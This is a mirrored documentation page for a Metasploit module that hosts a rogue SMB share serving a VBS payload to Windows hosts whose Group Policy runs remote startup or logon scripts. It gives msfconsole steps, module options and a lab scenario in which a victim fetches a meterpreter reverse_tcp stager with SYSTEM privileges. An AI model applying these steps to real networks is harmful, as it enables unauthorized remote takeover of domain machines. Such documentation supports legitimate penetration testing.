CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/smb/group_policy_startup.md
Views: 1904
Vulnerable Application
This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations. This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges, while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB share to exploit it successfully.
Please note in some cases, it will take 5 to 10 minutes to receive a session.
More information available at Gotham Digital Science Security
Verification Steps
Start msfconsole
Do:
use modules/exploits/windows/smb/group_policy_startupDo:
exploit
Options
FILE_NAME
VBS File name to share (Default: random .vbs)
FOLDER_NAME
Folder name to share (Default: none)
SHARE
Share name (Default: Random)
Scenarios
Domain Group Policy
In this scenario, the following computers are present:
Windows 7 (x64, Build 7601, SP1): Victim
Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller
The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the OU computer container. Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with SYSTEM privs because its executed as a start up script. Theoretically, any computer in that OU would also execute the script on started up.